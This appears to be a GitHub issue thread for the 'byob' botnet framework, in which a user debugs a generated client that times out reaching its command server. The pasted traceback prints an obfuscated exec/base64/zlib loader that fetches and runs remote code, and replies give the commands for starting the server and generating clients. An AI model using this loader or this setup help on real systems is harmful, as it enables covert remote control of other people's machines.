### ISSUE TITLE
Connection timed out. please help

### ISSUE THREAD

**Issue by KenUchicha** [malwaredllc/byob#140]
When I try to execute the byob_XXX.py file in my terminal, it shows error like connection timed out:
┌─[parrot@parrot]─[~/byob/byob]
└──╼ $python byob_h0K.py
Traceback (most recent call last):
  File "byob_h0K.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmFgYCgtyskvSM3TUM8oKSmw0tc3NtcztLDQMzI11DM0sLCyMDAw1NcvLklMTy0q1s8w8NYrqFTX1CtKTUzR0AQAStYSEA==')))))
  File "<string>", line 1, in <module>
  File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
    return opener.open(url)
  File "/usr/lib/python2.7/urllib.py", line 216, in open
    return getattr(self, name)(url)
  File "/usr/lib/python2.7/urllib.py", line 353, in open_http
    h.endheaders(data)
  File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 844, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 821, in connect
    self.timeout, self.source_address)
  File "/usr/lib/python2.7/socket.py", line 575, in create_connection
    raise err
IOError: [Errno socket error] [Errno 110] Connection timed out

Plus I have problem to acess the url [](https://myip:port/byob_XXXpy) _also connection timed out_
Please help

**Comment by malwaredllc** [comment]
What commands did you use to:
1) run the server
2) generate the client

**Comment by KensDevs** [comment]
1. `python server.py MYIP 8080 --freeze `
2. `python client.py --host MYIP --port 8080` , hope I didnt bad that.
Thanks for reply

**Comment by malwaredllc** [comment]
The `--freeze` argument is used for `client.py`, not `server.py`

**Comment by KensDevs** [comment]
Sorry I switched it, but in terminal I wrote it properly...

**Comment by Emilarity** [comment]
Verify that your server is actually listening on YOURIP:8080 since it looks like your client is just failing to reach your server

**Comment by KensDevs** [comment]
Thanks that solved it, but I gave new error :( 
┌─[✗]─[root@parrot]─[/home/parrot/byob/byob/dist]
└──╼ #python byob_mqI
  File "byob_mqI", line 1
SyntaxError: Non-ASCII character '\xe8' in file byob_mqI on line 2, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details
ALSO TRIED:
┌─[✗]─[root@parrot]─[/home/parrot/byob/byob/dist]
└──╼ #wine byob_mqI.exe
wine: Bad EXE format for Z:\home\parrot\byob\byob\dist\byob_mqI.exe.

**Comment by rotzbouf** [comment]
Please close your "connection timout"-thread and open a new one for the newly occured error (if you did not solved it already in the meantime. This will make things easier for anyone willing or able to help.
